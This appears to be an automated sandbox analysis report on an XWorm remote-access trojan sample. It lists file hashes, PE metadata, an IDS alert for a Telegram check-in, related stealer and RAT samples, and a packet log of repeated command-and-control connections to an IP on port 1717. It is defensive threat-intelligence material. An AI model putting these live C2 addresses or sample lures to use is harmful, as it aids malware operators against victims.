                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: Mzo6BdEtGv.exe
                          TimeTypeDescription
                          09:36:57API Interceptor13500228x Sleep call for process: Mzo6BdEtGv.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                            Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                      dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              89.40.31.232Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232/12/index.php
                                              No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232/12/index.php
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.telegram.orgPe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 149.154.167.220
                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                              • 149.154.167.220
                                              NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 149.154.167.220
                                              MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUtE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 149.154.167.220
                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 149.154.167.99
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 149.154.167.99
                                              TELEMEDIA-ASROtE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                              • 89.40.31.232
                                              Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232
                                              No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0etE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              https://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              idk_1.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                              • 149.154.167.220
                                              PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                              • 149.154.167.220
                                              No context
                                              No created / dropped files found
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):6.066050319145751
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Mzo6BdEtGv.exe
                                              File size:76'800 bytes
                                              MD5:068c99328320caaa7c5f2d31b0ff214b
                                              SHA1:e18b1e08e7f256602be60e1d75b15c2c73284ca2
                                              SHA256:e9434c0bf7be5e39cfad4fe44bb996b09c1283de5706a8721a33363080e9d016
                                              SHA512:a86c80a454c912f379c8077a1fcffc5b79681e4de7020fda900e55a59566dfc5e11086695448cdd33659ed6e6e000a4a46009be29ffa5a9eb3730014de48aa18
                                              SSDEEP:1536:mj2knMmhKdS08aK+rgYkdQOV9bFejQ4HyLPnqo9OMwPvyia:mQTnDrGdQo9bFxYo9OtVa
                                              TLSH:3E737D2837F60525F1FF6FF519F27222DB36B2236903E35F24C8029A5613A89CD516E6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pk.g................."...........A... ...`....@.. ....................................@................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x4141be
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x671F6B50 [Mon Oct 28 10:45:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1416c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x4be.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x121c40x12200d7f8574e16d0a7a57aede1e6caf0d3b3False0.6174434267241379data6.137584752270185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x160000x4be0x600aa6623607586acf6251d7d3eab083948False0.3697916666666667data3.6949593603858335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x180000xc0x200c85afa9a31cb63780333b2bb0d33c232False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x160a00x234data0.4698581560283688
                                              RT_MANIFEST0x162d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-25T15:36:47.299659+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.1049708149.154.167.220443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 15:36:45.011651993 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:45.011698008 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:45.011765957 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:45.074754953 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:45.074770927 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:46.570218086 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:46.570293903 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:46.573873043 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:46.573883057 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:46.574163914 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:46.618686914 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:46.702054977 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:46.743335962 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:47.299727917 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:47.299830914 CET44349708149.154.167.220192.168.2.10
                                              Nov 25, 2024 15:36:47.300189972 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:47.317476034 CET49708443192.168.2.10149.154.167.220
                                              Nov 25, 2024 15:36:50.942779064 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:36:51.074261904 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:36:51.074420929 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:36:51.114584923 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:36:51.243782043 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:01.999217987 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:02.188940048 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:12.853749990 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:12.985519886 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:13.036309004 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:13.036422968 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:14.212671995 CET497181717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:14.213624001 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:14.344054937 CET17174971889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:14.348429918 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:14.348587036 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:14.366730928 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:14.497004032 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:25.041264057 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:25.172992945 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:35.728528976 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:35.920326948 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:36.275782108 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:36.275897026 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:37.071959019 CET497721717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:37.073137045 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:37.197012901 CET17174977289.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:37.198059082 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:37.198244095 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:37.215034962 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:37.342473984 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:51.087804079 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:51.208170891 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:53.009833097 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:53.129981041 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:53.130034924 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:53.249963999 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:56.697453976 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:56.824083090 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:58.166016102 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:58.315584898 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:58.315726042 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:58.435669899 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:58.619103909 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:37:58.913522959 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:59.122746944 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:37:59.122869015 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:03.197484016 CET498231717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:03.199525118 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:03.317456961 CET17174982389.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:03.333470106 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:03.333683014 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:03.355621099 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:03.483253956 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:10.869290113 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:10.989866018 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:13.463335037 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:13.583376884 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:18.509994984 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:18.635452032 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:19.197299957 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:19.324258089 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:25.348613024 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:25.348788023 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:28.651307106 CET498801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:28.651726961 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:28.771333933 CET17174988089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:28.771904945 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:28.772012949 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:28.790117979 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:28.915683985 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:33.872720957 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:34.004977942 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:34.949280977 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:35.071454048 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:39.181611061 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:39.301554918 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:39.301836014 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:39.425033092 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:43.229888916 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:43.349889040 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:43.994236946 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:44.114365101 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:50.714871883 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:50.714946032 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.384612083 CET499311717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.386811972 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.504836082 CET17174993189.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:54.507111073 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:54.507189035 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.526411057 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.646820068 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:38:54.681843042 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:38:54.801748991 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:04.806827068 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:04.928764105 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:07.212944031 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:07.345477104 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:09.869434118 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:09.989568949 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:09.989964962 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:10.110548973 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:10.587991953 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:10.708396912 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:15.291383028 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:15.417047024 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:15.417098045 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:15.657501936 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:16.433938026 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:16.435481071 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.322424889 CET499781717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.327368021 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.442643881 CET17174997889.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:20.447663069 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:20.447770119 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.464605093 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.584577084 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:20.584645987 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.705548048 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:20.775429964 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:20.895566940 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:20.895616055 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:21.015556097 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:21.015608072 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:21.135871887 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:23.229243994 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:23.352474928 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:25.931979895 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:26.052483082 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:28.529392004 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:28.650633097 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:30.978890896 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:31.099704027 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:31.099798918 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:31.220143080 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:31.220197916 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:31.341058016 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:31.341157913 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:31.461282969 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:41.981462955 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:42.103239059 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:42.372255087 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:42.372338057 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:46.431684971 CET499791717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:46.437416077 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:46.555243969 CET17174997989.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:46.561199903 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:46.561391115 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:46.578988075 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:46.815752029 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:50.338186026 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:50.458125114 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:50.699428082 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:50.971405029 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:51.322591066 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:51.445295095 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:51.760092974 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:51.881337881 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:51.881479025 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:52.030786991 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:54.353727102 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:54.473891973 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:56.841449022 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:56.961457014 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:56.963021040 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:57.085228920 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:57.085309029 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:57.205307007 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:39:57.291425943 CET499801717192.168.2.1089.40.31.232
                                              Nov 25, 2024 15:39:57.411885977 CET17174998089.40.31.232192.168.2.10
                                              Nov 25, 2024 15:40:03.964085102 CET499801717192.168.2.1089.40.31.232
